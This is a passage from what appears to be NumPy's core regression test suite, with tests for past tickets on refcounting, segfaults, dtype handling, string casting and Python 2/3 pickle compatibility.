assert_(cnt(a) == cnt0_a + 5 + 3*5)
tmp = arr1.take([1, 2, 3], axis=0)
assert_(cnt(a) == cnt0_a + 5 + 3)
x = np.array([[0], [1], [0], [1], [1]], int)
tmp = x.choose(arr1, arr2)
assert_(cnt(a) == cnt0_a + 5 + 2)
assert_(cnt(b) == cnt0_b + 5 + 3)
del tmp # Avoid pyflakes unused variable warning
def test_mem_custom_float_to_array(self, level=rlevel):
# Ticket 702
class MyFloat(object):
def __float__(self):
return 1.0
tmp = np.atleast_1d([MyFloat()])
tmp.astype(float) # Should succeed
def test_object_array_refcount_self_assign(self, level=rlevel):
# Ticket #711
class VictimObject(object):
deleted = False
def __del__(self):
self.deleted = True
d = VictimObject()
arr = np.zeros(5, dtype=np.object_)
arr[:] = d
del d
arr[:] = arr # refcount of 'd' might hit zero here
assert_(not arr[0].deleted)
arr[:] = arr # trying to induce a segfault by doing it again...
assert_(not arr[0].deleted)
def test_mem_fromiter_invalid_dtype_string(self, level=rlevel):
x = [1, 2, 3]
self.assertRaises(ValueError,
np.fromiter, [xi for xi in x], dtype='S')
def test_reduce_big_object_array(self, level=rlevel):
# Ticket #713
oldsize = np.setbufsize(10*16)
a = np.array([None]*161, object)
assert_(not np.any(a))
np.setbufsize(oldsize)
def test_mem_0d_array_index(self, level=rlevel):
# Ticket #714
np.zeros(10)[np.array(0)]
def test_floats_from_string(self, level=rlevel):
# Ticket #640, floats from string
fsingle = np.single('1.234')
fdouble = np.double('1.234')
flongdouble = np.longdouble('1.234')
assert_almost_equal(fsingle, 1.234)
assert_almost_equal(fdouble, 1.234)
assert_almost_equal(flongdouble, 1.234)
def test_nonnative_endian_fill(self, level=rlevel):
# Non-native endian arrays were incorrectly filled with scalars
# before r5034.
if sys.byteorder == 'little':
dtype = np.dtype('>i4')
else:
dtype = np.dtype('<i4')
x = np.empty([1], dtype=dtype)
x.fill(1)
assert_equal(x, np.array([1], dtype=dtype))
def test_dot_alignment_sse2(self, level=rlevel):
# Test for ticket #551, changeset r5140
x = np.zeros((30, 40))
y = pickle.loads(pickle.dumps(x))
# y is now typically not aligned on a 8-byte boundary
z = np.ones((1, y.shape[0]))
# This shouldn't cause a segmentation fault:
np.dot(z, y)
def test_astype_copy(self, level=rlevel):
# Ticket #788, changeset r5155
# The test data file was generated by scipy.io.savemat.
# The dtype is float64, but the isbuiltin attribute is 0.
data_dir = path.join(path.dirname(__file__), 'data')
filename = path.join(data_dir, "astype_copy.pkl")
if sys.version_info[0] >= 3:
f = open(filename, 'rb')
xp = pickle.load(f, encoding='latin1')
f.close()
else:
f = open(filename)
xp = pickle.load(f)
f.close()
xpd = xp.astype(np.float64)
assert_((xp.__array_interface__['data'][0] !=
xpd.__array_interface__['data'][0]))
def test_compress_small_type(self, level=rlevel):
# Ticket #789, changeset 5217.
# compress with out argument segfaulted if cannot cast safely
import numpy as np
a = np.array([[1, 2], [3, 4]])
b = np.zeros((2, 1), dtype=np.single)
try:
a.compress([True, False], axis=1, out=b)
raise AssertionError("compress with an out which cannot be "
"safely casted should not return "
"successfully")
except TypeError:
pass
def test_attributes(self, level=rlevel):
# Ticket #791
class TestArray(np.ndarray):
def __new__(cls, data, info):
result = np.array(data)
result = result.view(cls)
result.info = info
return result
def __array_finalize__(self, obj):
self.info = getattr(obj, 'info', '')
dat = TestArray([[1, 2, 3, 4], [5, 6, 7, 8]], 'jubba')
assert_(dat.info == 'jubba')
dat.resize((4, 2))
assert_(dat.info == 'jubba')
dat.sort()
assert_(dat.info == 'jubba')
dat.fill(2)
assert_(dat.info == 'jubba')
dat.put([2, 3, 4], [6, 3, 4])
assert_(dat.info == 'jubba')
dat.setfield(4, np.int32, 0)
assert_(dat.info == 'jubba')
dat.setflags()
assert_(dat.info == 'jubba')
assert_(dat.all(1).info == 'jubba')
assert_(dat.any(1).info == 'jubba')
assert_(dat.argmax(1).info == 'jubba')
assert_(dat.argmin(1).info == 'jubba')
assert_(dat.argsort(1).info == 'jubba')
assert_(dat.astype(TestArray).info == 'jubba')
assert_(dat.byteswap().info == 'jubba')
assert_(dat.clip(2, 7).info == 'jubba')
assert_(dat.compress([0, 1, 1]).info == 'jubba')
assert_(dat.conj().info == 'jubba')
assert_(dat.conjugate().info == 'jubba')
assert_(dat.copy().info == 'jubba')
dat2 = TestArray([2, 3, 1, 0], 'jubba')
choices = [[0, 1, 2, 3], [10, 11, 12, 13],
[20, 21, 22, 23], [30, 31, 32, 33]]
assert_(dat2.choose(choices).info == 'jubba')
assert_(dat.cumprod(1).info == 'jubba')
assert_(dat.cumsum(1).info == 'jubba')
assert_(dat.diagonal().info == 'jubba')
assert_(dat.flatten().info == 'jubba')
assert_(dat.getfield(np.int32, 0).info == 'jubba')
assert_(dat.imag.info == 'jubba')
assert_(dat.max(1).info == 'jubba')
assert_(dat.mean(1).info == 'jubba')
assert_(dat.min(1).info == 'jubba')
assert_(dat.newbyteorder().info == 'jubba')
assert_(dat.prod(1).info == 'jubba')
assert_(dat.ptp(1).info == 'jubba')
assert_(dat.ravel().info == 'jubba')
assert_(dat.real.info == 'jubba')
assert_(dat.repeat(2).info == 'jubba')
assert_(dat.reshape((2, 4)).info == 'jubba')
assert_(dat.round().info == 'jubba')
assert_(dat.squeeze().info == 'jubba')
assert_(dat.std(1).info == 'jubba')
assert_(dat.sum(1).info == 'jubba')
assert_(dat.swapaxes(0, 1).info == 'jubba')
assert_(dat.take([2, 3, 5]).info == 'jubba')
assert_(dat.transpose().info == 'jubba')
assert_(dat.T.info == 'jubba')
assert_(dat.var(1).info == 'jubba')
assert_(dat.view(TestArray).info == 'jubba')
# These methods do not preserve subclasses
assert_(type(dat.nonzero()[0]) is np.ndarray)
assert_(type(dat.nonzero()[1]) is np.ndarray)
def test_recarray_tolist(self, level=rlevel):
# Ticket #793, changeset r5215
# Comparisons fail for NaN, so we can't use random memory
# for the test.
buf = np.zeros(40, dtype=np.int8)
a = np.recarray(2, formats="i4,f8,f8", names="id,x,y", buf=buf)
b = a.tolist()
assert_( a[0].tolist() == b[0])
assert_( a[1].tolist() == b[1])
def test_nonscalar_item_method(self):
# Make sure that .item() fails graciously when it should
a = np.arange(5)
assert_raises(ValueError, a.item)
def test_char_array_creation(self, level=rlevel):
a = np.array('123', dtype='c')
b = np.array(asbytes_nested(['1', '2', '3']))
assert_equal(a, b)
def test_unaligned_unicode_access(self, level=rlevel):
# Ticket #825
for i in range(1, 9):
msg = 'unicode offset: %d chars' % i
t = np.dtype([('a', 'S%d' % i), ('b', 'U2')])
x = np.array([(asbytes('a'), sixu('b'))], dtype=t)
if sys.version_info[0] >= 3:
assert_equal(str(x), "[(b'a', 'b')]", err_msg=msg)
else:
assert_equal(str(x), "[('a', u'b')]", err_msg=msg)
def test_sign_for_complex_nan(self, level=rlevel):
# Ticket 794.
with np.errstate(invalid='ignore'):
C = np.array([-np.inf, -2+1j, 0, 2-1j, np.inf, np.nan])
have = np.sign(C)
want = np.array([-1+0j, -1+0j, 0+0j, 1+0j, 1+0j, np.nan])
assert_equal(have, want)
def test_for_equal_names(self, level=rlevel):
# Ticket #674
dt = np.dtype([('foo', float), ('bar', float)])
a = np.zeros(10, dt)
b = list(a.dtype.names)
b[0] = "notfoo"
a.dtype.names = b
assert_(a.dtype.names[0] == "notfoo")
assert_(a.dtype.names[1] == "bar")
def test_for_object_scalar_creation(self, level=rlevel):
# Ticket #816
a = np.object_()
b = np.object_(3)
b2 = np.object_(3.0)
c = np.object_([4, 5])
d = np.object_([None, {}, []])
assert_(a is None)
assert_(type(b) is int)
assert_(type(b2) is float)
assert_(type(c) is np.ndarray)
assert_(c.dtype == object)
assert_(d.dtype == object)
def test_array_resize_method_system_error(self):
# Ticket #840 - order should be an invalid keyword.
x = np.array([[0, 1], [2, 3]])
self.assertRaises(TypeError, x.resize, (2, 2), order='C')
def test_for_zero_length_in_choose(self, level=rlevel):
"Ticket #882"
a = np.array(1)
self.assertRaises(ValueError, lambda x: x.choose([]), a)
def test_array_ndmin_overflow(self):
"Ticket #947."
self.assertRaises(ValueError, lambda: np.array([1], ndmin=33))
def test_errobj_reference_leak(self, level=rlevel):
# Ticket #955
with np.errstate(all="ignore"):
z = int(0)
p = np.int32(-1)
gc.collect()
n_before = len(gc.get_objects())
z**p # this shouldn't leak a reference to errobj
gc.collect()
n_after = len(gc.get_objects())
assert_(n_before >= n_after, (n_before, n_after))
def test_void_scalar_with_titles(self, level=rlevel):
# No ticket
data = [('john', 4), ('mary', 5)]
dtype1 = [(('source:yy', 'name'), 'O'), (('source:xx', 'id'), int)]
arr = np.array(data, dtype=dtype1)
assert_(arr[0][0] == 'john')
assert_(arr[0][1] == 4)
def test_void_scalar_constructor(self):
#Issue #1550
#Create test string data, construct void scalar from data and assert
#that void scalar contains original data.
test_string = np.array("test")
test_string_void_scalar = np.core.multiarray.scalar(
np.dtype(("V", test_string.dtype.itemsize)), test_string.tobytes())
assert_(test_string_void_scalar.view(test_string.dtype) == test_string)
#Create record scalar, construct from data and assert that
#reconstructed scalar is correct.
test_record = np.ones((), "i,i")
test_record_void_scalar = np.core.multiarray.scalar(
test_record.dtype, test_record.tobytes())
assert_(test_record_void_scalar == test_record)
#Test pickle and unpickle of void and record scalars
assert_(pickle.loads(pickle.dumps(test_string)) == test_string)
assert_(pickle.loads(pickle.dumps(test_record)) == test_record)
def test_blasdot_uninitialized_memory(self):
# Ticket #950
for m in [0, 1, 2]:
for n in [0, 1, 2]:
for k in range(3):
# Try to ensure that x->data contains non-zero floats
x = np.array([123456789e199], dtype=np.float64)
x.resize((m, 0))
y = np.array([123456789e199], dtype=np.float64)
y.resize((0, n))
# `dot` should just return zero (m,n) matrix
z = np.dot(x, y)
assert_(np.all(z == 0))
assert_(z.shape == (m, n))
def test_zeros(self):
# Regression test for #1061.
# Set a size which cannot fit into a 64 bits signed integer
sz = 2 ** 64
good = 'Maximum allowed dimension exceeded'
try:
np.empty(sz)
except ValueError as e:
if not str(e) == good:
self.fail("Got msg '%s', expected '%s'" % (e, good))
except Exception as e:
self.fail("Got exception of type %s instead of ValueError" % type(e))
def test_huge_arange(self):
# Regression test for #1062.
# Set a size which cannot fit into a 64 bits signed integer
sz = 2 ** 64
good = 'Maximum allowed size exceeded'
try:
np.arange(sz)
self.assertTrue(np.size == sz)
except ValueError as e:
if not str(e) == good:
self.fail("Got msg '%s', expected '%s'" % (e, good))
except Exception as e:
self.fail("Got exception of type %s instead of ValueError" % type(e))
def test_fromiter_bytes(self):
# Ticket #1058
a = np.fromiter(list(range(10)), dtype='b')
b = np.fromiter(list(range(10)), dtype='B')
assert_(np.alltrue(a == np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])))
assert_(np.alltrue(b == np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])))
def test_array_from_sequence_scalar_array(self):
# Ticket #1078: segfaults when creating an array with a sequence of
# 0d arrays.
a = np.array((np.ones(2), np.array(2)))
assert_equal(a.shape, (2,))
assert_equal(a.dtype, np.dtype(object))
assert_equal(a[0], np.ones(2))
assert_equal(a[1], np.array(2))
a = np.array(((1,), np.array(1)))
assert_equal(a.shape, (2,))
assert_equal(a.dtype, np.dtype(object))
assert_equal(a[0], (1,))
assert_equal(a[1], np.array(1))
def test_array_from_sequence_scalar_array2(self):
# Ticket #1081: weird array with strange input...
t = np.array([np.array([]), np.array(0, object)])
assert_equal(t.shape, (2,))
assert_equal(t.dtype, np.dtype(object))
def test_array_too_big(self):
# Ticket #1080.
assert_raises(ValueError, np.zeros, [975]*7, np.int8)
assert_raises(ValueError, np.zeros, [26244]*5, np.int8)
def test_dtype_keyerrors_(self):
# Ticket #1106.
dt = np.dtype([('f1', np.uint)])
assert_raises(KeyError, dt.__getitem__, "f2")
assert_raises(IndexError, dt.__getitem__, 1)
assert_raises(ValueError, dt.__getitem__, 0.0)
def test_lexsort_buffer_length(self):
# Ticket #1217, don't segfault.
a = np.ones(100, dtype=np.int8)
b = np.ones(100, dtype=np.int32)
i = np.lexsort((a[::-1], b))
assert_equal(i, np.arange(100, dtype=np.int))
def test_object_array_to_fixed_string(self):
# Ticket #1235.
a = np.array(['abcdefgh', 'ijklmnop'], dtype=np.object_)
b = np.array(a, dtype=(np.str_, 8))
assert_equal(a, b)
c = np.array(a, dtype=(np.str_, 5))
assert_equal(c, np.array(['abcde', 'ijklm']))
d = np.array(a, dtype=(np.str_, 12))
assert_equal(a, d)
e = np.empty((2, ), dtype=(np.str_, 8))
e[:] = a[:]
assert_equal(a, e)
def test_unicode_to_string_cast(self):
# Ticket #1240.
a = np.array([[sixu('abc'), sixu('\u03a3')],
[sixu('asdf'), sixu('erw')]],
dtype='U')
self.assertRaises(UnicodeEncodeError, np.array, a, 'S4')
def test_mixed_string_unicode_array_creation(self):
a = np.array(['1234', sixu('123')])
assert_(a.itemsize == 16)
a = np.array([sixu('123'), '1234'])
assert_(a.itemsize == 16)
a = np.array(['1234', sixu('123'), '12345'])
assert_(a.itemsize == 20)
a = np.array([sixu('123'), '1234', sixu('12345')])
assert_(a.itemsize == 20)
a = np.array([sixu('123'), '1234', sixu('1234')])
assert_(a.itemsize == 16)
def test_misaligned_objects_segfault(self):
# Ticket #1198 and #1267
a1 = np.zeros((10,), dtype='O,c')
a2 = np.array(['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j'], 'S10')
a1['f0'] = a2
repr(a1)
np.argmax(a1['f0'])
a1['f0'][1] = "FOO"
a1['f0'] = "FOO"
np.array(a1['f0'], dtype='S')
np.nonzero(a1['f0'])
a1.sort()
copy.deepcopy(a1)
def test_misaligned_scalars_segfault(self):
# Ticket #1267
s1 = np.array(('a', 'Foo'), dtype='c,O')
s2 = np.array(('b', 'Bar'), dtype='c,O')
s1['f1'] = s2['f1']
s1['f1'] = 'Baz'
def test_misaligned_dot_product_objects(self):
# Ticket #1267
# This didn't require a fix, but it's worth testing anyway, because
# it may fail if .dot stops enforcing the arrays to be BEHAVED
a = np.array([[(1, 'a'), (0, 'a')], [(0, 'a'), (1, 'a')]], dtype='O,c')
b = np.array([[(4, 'a'), (1, 'a')], [(2, 'a'), (2, 'a')]], dtype='O,c')
np.dot(a['f0'], b['f0'])
def test_byteswap_complex_scalar(self):
# Ticket #1259 and gh-441
for dtype in [np.dtype('<'+t) for t in np.typecodes['Complex']]:
z = np.array([2.2-1.1j], dtype)
x = z[0] # always native-endian
y = x.byteswap()
if x.dtype.byteorder == z.dtype.byteorder:
# little-endian machine
assert_equal(x, np.fromstring(y.tobytes(), dtype=dtype.newbyteorder()))
else:
# big-endian machine
assert_equal(x, np.fromstring(y.tobytes(), dtype=dtype))
# double check real and imaginary parts:
assert_equal(x.real, y.real.byteswap())
assert_equal(x.imag, y.imag.byteswap())
def test_structured_arrays_with_objects1(self):
# Ticket #1299
stra = 'aaaa'
strb = 'bbbb'
x = np.array([[(0, stra), (1, strb)]], 'i8,O')
x[x.nonzero()] = x.ravel()[:1]
assert_(x[0, 1] == x[0, 0])
def test_structured_arrays_with_objects2(self):
# Ticket #1299 second test
stra = 'aaaa'
strb = 'bbbb'
numb = sys.getrefcount(strb)
numa = sys.getrefcount(stra)
x = np.array([[(0, stra), (1, strb)]], 'i8,O')
x[x.nonzero()] = x.ravel()[:1]
assert_(sys.getrefcount(strb) == numb)
assert_(sys.getrefcount(stra) == numa + 2)
def test_duplicate_title_and_name(self):
# Ticket #1254
dtspec = [(('a', 'a'), 'i'), ('b', 'i')]
self.assertRaises(ValueError, np.dtype, dtspec)
def test_signed_integer_division_overflow(self):
# Ticket #1317.
def test_type(t):
min = np.array([np.iinfo(t).min])
min //= -1
with np.errstate(divide="ignore"):
for t in (np.int8, np.int16, np.int32, np.int64, np.int, np.long):
test_type(t)
def test_buffer_hashlib(self):
try:
from hashlib import md5
except ImportError:
from md5 import new as md5
x = np.array([1, 2, 3], dtype=np.dtype('<i4'))
assert_equal(md5(x).hexdigest(), '2a1dd1e1e59d0a384c26951e316cd7e6')
def test_0d_string_scalar(self):
# Bug #1436; the following should succeed
np.asarray('x', '>c')
def test_log1p_compiler_shenanigans(self):
# Check if log1p is behaving on 32 bit intel systems.
assert_(np.isfinite(np.log1p(np.exp2(-53))))
def test_fromiter_comparison(self, level=rlevel):
a = np.fromiter(list(range(10)), dtype='b')
b = np.fromiter(list(range(10)), dtype='B')
assert_(np.alltrue(a == np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])))
assert_(np.alltrue(b == np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])))
def test_fromstring_crash(self):
# Ticket #1345: the following should not cause a crash
np.fromstring(asbytes('aa, aa, 1.0'), sep=',')
def test_ticket_1539(self):
dtypes = [x for x in np.typeDict.values()
if (issubclass(x, np.number)
and not issubclass(x, np.timedelta64))]
a = np.array([], dtypes[0])
failures = []
# ignore complex warnings
with warnings.catch_warnings():
warnings.simplefilter('ignore', np.ComplexWarning)
for x in dtypes:
b = a.astype(x)
for y in dtypes:
c = a.astype(y)
try:
np.dot(b, c)
except TypeError:
failures.append((x, y))
if failures:
raise AssertionError("Failures: %r" % failures)
def test_ticket_1538(self):
x = np.finfo(np.float32)
for name in 'eps epsneg max min resolution tiny'.split():
assert_equal(type(getattr(x, name)), np.float32,
err_msg=name)
def test_ticket_1434(self):
# Check that the out= argument in var and std has an effect
data = np.array(((1, 2, 3), (4, 5, 6), (7, 8, 9)))
out = np.zeros((3,))
ret = data.var(axis=1, out=out)
assert_(ret is out)
assert_array_equal(ret, data.var(axis=1))
ret = data.std(axis=1, out=out)
assert_(ret is out)
assert_array_equal(ret, data.std(axis=1))
def test_complex_nan_maximum(self):
cnan = complex(0, np.nan)
assert_equal(np.maximum(1, cnan), cnan)
def test_subclass_int_tuple_assignment(self):
# ticket #1563
class Subclass(np.ndarray):
def __new__(cls, i):
return np.ones((i,)).view(cls)
x = Subclass(5)
x[(0,)] = 2 # shouldn't raise an exception
assert_equal(x[0], 2)
def test_ufunc_no_unnecessary_views(self):
# ticket #1548
class Subclass(np.ndarray):
pass
x = np.array([1, 2, 3]).view(Subclass)
y = np.add(x, x, x)
assert_equal(id(x), id(y))
def test_take_refcount(self):
# ticket #939
a = np.arange(16, dtype=np.float)
a.shape = (4, 4)
lut = np.ones((5 + 3, 4), np.float)
rgba = np.empty(shape=a.shape + (4,), dtype=lut.dtype)
c1 = sys.getrefcount(rgba)
try:
lut.take(a, axis=0, mode='clip', out=rgba)
except TypeError:
pass
c2 = sys.getrefcount(rgba)
assert_equal(c1, c2)
def test_fromfile_tofile_seeks(self):
# On Python 3, tofile/fromfile used to get (#1610) the Python
# file handle out of sync
f0 = tempfile.NamedTemporaryFile()
f = f0.file
f.write(np.arange(255, dtype='u1').tobytes())
f.seek(20)
ret = np.fromfile(f, count=4, dtype='u1')
assert_equal(ret, np.array([20, 21, 22, 23], dtype='u1'))
assert_equal(f.tell(), 24)
f.seek(40)
np.array([1, 2, 3], dtype='u1').tofile(f)
assert_equal(f.tell(), 43)
f.seek(40)
data = f.read(3)
assert_equal(data, asbytes("\x01\x02\x03"))
f.seek(80)
f.read(4)
data = np.fromfile(f, dtype='u1', count=4)
assert_equal(data, np.array([84, 85, 86, 87], dtype='u1'))
f.close()
def test_complex_scalar_warning(self):
for tp in [np.csingle, np.cdouble, np.clongdouble]:
x = tp(1+2j)
assert_warns(np.ComplexWarning, float, x)
with warnings.catch_warnings():
warnings.simplefilter('ignore')
assert_equal(float(x), float(x.real))
def test_complex_scalar_complex_cast(self):
for tp in [np.csingle, np.cdouble, np.clongdouble]:
x = tp(1+2j)
assert_equal(complex(x), 1+2j)
def test_complex_boolean_cast(self):
# Ticket #2218
for tp in [np.csingle, np.cdouble, np.clongdouble]:
x = np.array([0, 0+0.5j, 0.5+0j], dtype=tp)
assert_equal(x.astype(bool), np.array([0, 1, 1], dtype=bool))
assert_(np.any(x))
assert_(np.all(x[1:]))
def test_uint_int_conversion(self):
x = 2**64 - 1
assert_equal(int(np.uint64(x)), x)
def test_duplicate_field_names_assign(self):
ra = np.fromiter(((i*3, i*2) for i in range(10)), dtype='i8,f8')
ra.dtype.names = ('f1', 'f2')
repr(ra) # should not cause a segmentation fault
assert_raises(ValueError, setattr, ra.dtype, 'names', ('f1', 'f1'))
def test_eq_string_and_object_array(self):
# From e-mail thread "__eq__ with str and object" (Keith Goodman)
a1 = np.array(['a', 'b'], dtype=object)
a2 = np.array(['a', 'c'])
assert_array_equal(a1 == a2, [True, False])
assert_array_equal(a2 == a1, [True, False])
def test_nonzero_byteswap(self):
a = np.array([0x80000000, 0x00000080, 0], dtype=np.uint32)
a.dtype = np.float32
assert_equal(a.nonzero()[0], [1])
a = a.byteswap().newbyteorder()
assert_equal(a.nonzero()[0], [1]) # [0] if nonzero() ignores swap
def test_find_common_type_boolean(self):
# Ticket #1695
assert_(np.find_common_type([], ['?', '?']) == '?')
def test_empty_mul(self):
a = np.array([1.])
a[1:1] *= 2
assert_equal(a, [1.])
def test_array_side_effect(self):
# The second use of itemsize was throwing an exception because in
# ctors.c, discover_itemsize was calling PyObject_Length without
# checking the return code. This failed to get the length of the
# number 2, and the exception hung around until something checked
# PyErr_Occurred() and returned an error.
assert_equal(np.dtype('S10').itemsize, 10)
np.array([['abc', 2], ['long ', '0123456789']], dtype=np.string_)
assert_equal(np.dtype('S10').itemsize, 10)
def test_any_float(self):
# all and any for floats
a = np.array([0.1, 0.9])
assert_(np.any(a))
assert_(np.all(a))
def test_large_float_sum(self):
a = np.arange(10000, dtype='f')
assert_equal(a.sum(dtype='d'), a.astype('d').sum())
def test_ufunc_casting_out(self):
a = np.array(1.0, dtype=np.float32)
b = np.array(1.0, dtype=np.float64)
c = np.array(1.0, dtype=np.float32)
np.add(a, b, out=c)
assert_equal(c, 2.0)
def test_array_scalar_contiguous(self):
# Array scalars are both C and Fortran contiguous
assert_(np.array(1.0).flags.c_contiguous)
assert_(np.array(1.0).flags.f_contiguous)
assert_(np.array(np.float32(1.0)).flags.c_contiguous)
assert_(np.array(np.float32(1.0)).flags.f_contiguous)
def test_squeeze_contiguous(self):
# Similar to GitHub issue #387
a = np.zeros((1, 2)).squeeze()
b = np.zeros((2, 2, 2), order='F')[:,:, ::2].squeeze()
assert_(a.flags.c_contiguous)
assert_(a.flags.f_contiguous)
assert_(b.flags.f_contiguous)
def test_reduce_contiguous(self):
# GitHub issue #387
a = np.add.reduce(np.zeros((2, 1, 2)), (0, 1))
b = np.add.reduce(np.zeros((2, 1, 2)), 1)
assert_(a.flags.c_contiguous)
assert_(a.flags.f_contiguous)
assert_(b.flags.c_contiguous)
def test_object_array_self_reference(self):
# Object arrays with references to themselves can cause problems
a = np.array(0, dtype=object)
a[()] = a
assert_raises(TypeError, int, a)
assert_raises(TypeError, long, a)
assert_raises(TypeError, float, a)
assert_raises(TypeError, oct, a)
assert_raises(TypeError, hex, a)
# Test the same for a circular reference.
b = np.array(a, dtype=object)
a[()] = b
assert_raises(TypeError, int, a)
# Numpy has no tp_traverse currently, so circular references
# cannot be detected. So resolve it:
a[()] = 0
# This was causing a to become like the above
a = np.array(0, dtype=object)
a[...] += 1
assert_equal(a, 1)
def test_object_array_self_copy(self):
# An object array being copied into itself DECREF'ed before INCREF'ing
# causing segmentation faults (gh-3787)
a = np.array(object(), dtype=object)
np.copyto(a, a)
assert_equal(sys.getrefcount(a[()]), 2)
a[()].__class__ # will segfault if object was deleted
def test_zerosize_accumulate(self):
"Ticket #1733"
x = np.array([[42, 0]], dtype=np.uint32)
assert_equal(np.add.accumulate(x[:-1, 0]), [])
def test_objectarray_setfield(self):
# Setfield should not overwrite Object fields with non-Object data
x = np.array([1, 2, 3], dtype=object)
assert_raises(TypeError, x.setfield, 4, np.int32, 0)
def test_setting_rank0_string(self):
"Ticket #1736"
s1 = asbytes("hello1")
s2 = asbytes("hello2")
a = np.zeros((), dtype="S10")
a[()] = s1
assert_equal(a, np.array(s1))
a[()] = np.array(s2)
assert_equal(a, np.array(s2))
a = np.zeros((), dtype='f4')
a[()] = 3
assert_equal(a, np.array(3))
a[()] = np.array(4)
assert_equal(a, np.array(4))
def test_string_astype(self):
"Ticket #1748"
s1 = asbytes('black')
s2 = asbytes('white')
s3 = asbytes('other')
a = np.array([[s1], [s2], [s3]])
assert_equal(a.dtype, np.dtype('S5'))
b = a.astype(np.dtype('S0'))
assert_equal(b.dtype, np.dtype('S5'))
def test_ticket_1756(self):
# Ticket #1756
s = asbytes('0123456789abcdef')
a = np.array([s]*5)
for i in range(1, 17):
a1 = np.array(a, "|S%d" % i)
a2 = np.array([s[:i]]*5)
assert_equal(a1, a2)
def test_fields_strides(self):
"Ticket #1760"
r = np.fromstring('abcdefghijklmnop'*4*3, dtype='i4,(2,3)u2')
assert_equal(r[0:3:2]['f1'], r['f1'][0:3:2])
assert_equal(r[0:3:2]['f1'][0], r[0:3:2][0]['f1'])
assert_equal(r[0:3:2]['f1'][0][()], r[0:3:2][0]['f1'][()])
assert_equal(r[0:3:2]['f1'][0].strides, r[0:3:2][0]['f1'].strides)
def test_alignment_update(self):
# Check that alignment flag is updated on stride setting
a = np.arange(10)
assert_(a.flags.aligned)
a.strides = 3
assert_(not a.flags.aligned)
def test_ticket_1770(self):
"Should not segfault on python 3k"
import numpy as np
try:
a = np.zeros((1,), dtype=[('f1', 'f')])
a['f1'] = 1
a['f2'] = 1
except ValueError:
pass
except:
raise AssertionError
def test_ticket_1608(self):
"x.flat shouldn't modify data"
x = np.array([[1, 2], [3, 4]]).T
np.array(x.flat)
assert_equal(x, [[1, 3], [2, 4]])
def test_pickle_string_overwrite(self):
import re
data = np.array([1], dtype='b')
blob = pickle.dumps(data, protocol=1)
data = pickle.loads(blob)
# Check that loads does not clobber interned strings
s = re.sub("a(.)", "\x01\\1", "a_")
assert_equal(s[0], "\x01")
data[0] = 0xbb
s = re.sub("a(.)", "\x01\\1", "a_")
assert_equal(s[0], "\x01")
def test_pickle_bytes_overwrite(self):
if sys.version_info[0] >= 3:
data = np.array([1], dtype='b')
data = pickle.loads(pickle.dumps(data))
data[0] = 0xdd
bytestring = "\x01 ".encode('ascii')
assert_equal(bytestring[0:1], '\x01'.encode('ascii'))
def test_pickle_py2_array_latin1_hack(self):
# Check that unpickling hacks in Py3 that support
# encoding='latin1' work correctly.
# Python2 output for pickle.dumps(numpy.array([129], dtype='b'))
data = asbytes("cnumpy.core.multiarray\n_reconstruct\np0\n(cnumpy\nndarray\np1\n(I0\n"
"tp2\nS'b'\np3\ntp4\nRp5\n(I1\n(I1\ntp6\ncnumpy\ndtype\np7\n(S'i1'\np8\n"
"I0\nI1\ntp9\nRp10\n(I3\nS'|'\np11\nNNNI-1\nI-1\nI0\ntp12\nbI00\nS'\\x81'\n"
"p13\ntp14\nb.")
if sys.version_info[0] >= 3:
# This should work:
result = pickle.loads(data, encoding='latin1')
assert_array_equal(result, np.array([129], dtype='b'))
# Should not segfault:
assert_raises(Exception, pickle.loads, data, encoding='koi8-r')
def test_pickle_py2_scalar_latin1_hack(self):
# Check that scalar unpickling hack in Py3 that supports
# encoding='latin1' work correctly.
# Python2 output for pickle.dumps(...)
datas = [
# (original, python2_pickle, koi8r_validity)
(np.unicode_('\u6bd2'),
asbytes("cnumpy.core.multiarray\nscalar\np0\n(cnumpy\ndtype\np1\n"
"(S'U1'\np2\nI0\nI1\ntp3\nRp4\n(I3\nS'<'\np5\nNNNI4\nI4\nI0\n"
"tp6\nbS'\\xd2k\\x00\\x00'\np7\ntp8\nRp9\n."),
'invalid'),
(np.float64(9e123),
asbytes("cnumpy.core.multiarray\nscalar\np0\n(cnumpy\ndtype\np1\n(S'f8'\n"
"p2\nI0\nI1\ntp3\nRp4\n(I3\nS'<'\np5\nNNNI-1\nI-1\nI0\ntp6\n"
"bS'O\\x81\\xb7Z\\xaa:\\xabY'\np7\ntp8\nRp9\n."),
'invalid'),
(np.bytes_(asbytes('\x9c')), # different 8-bit code point in KOI8-R vs latin1
asbytes("cnumpy.core.multiarray\nscalar\np0\n(cnumpy\ndtype\np1\n(S'S1'\np2\n"
"I0\nI1\ntp3\nRp4\n(I3\nS'|'\np5\nNNNI1\nI1\nI0\ntp6\nbS'\\x9c'\np7\n"
"tp8\nRp9\n."),
'different'),
]
if sys.version_info[0] >= 3:
for original, data, koi8r_validity in datas:
result = pickle.loads(data, encoding='latin1')
assert_equal(result, original)
# Decoding under non-latin1 encoding (e.g.) KOI8-R can
# produce bad results, but should not segfault.
if koi8r_validity == 'different':
# Unicode code points happen to lie within latin1,
# but are different in koi8-r, resulting to silent
# bogus results
result = pickle.loads(data, encoding='koi8-r')
assert_(result != original)
elif koi8r_validity == 'invalid':
# Unicode code points outside latin1, so results
# to an encoding exception
assert_raises(ValueError, pickle.loads, data, encoding='koi8-r')
else:
raise ValueError(koi8r_validity)
def test_structured_type_to_object(self):
a_rec = np.array([(0, 1), (3, 2)], dtype='i4,i8')
a_obj = np.empty((2,), dtype=object)
a_obj[0] = (0, 1)
a_obj[1] = (3, 2)
# astype records -> object
assert_equal(a_rec.astype(object), a_obj)
# '=' records -> object
b = np.empty_like(a_obj)
b[...] = a_rec
assert_equal(b, a_obj)
# '=' object -> records
b = np.empty_like(a_rec)
b[...] = a_obj
assert_equal(b, a_rec)
def test_assign_obj_listoflists(self):
# Ticket # 1870
# The inner list should get assigned to the object elements
a = np.zeros(4, dtype=object)
b = a.copy()
a[0] = [1]
a[1] = [2]
a[2] = [3]
a[3] = [4]
b[...] = [[1], [2], [3], [4]]
assert_equal(a, b)
# The first dimension should get broadcast
a = np.zeros((2, 2), dtype=object)
a[...] = [[1, 2]]
assert_equal(a, [[1, 2], [1, 2]])
def test_memoryleak(self):
# Ticket #1917 - ensure that array data doesn't leak
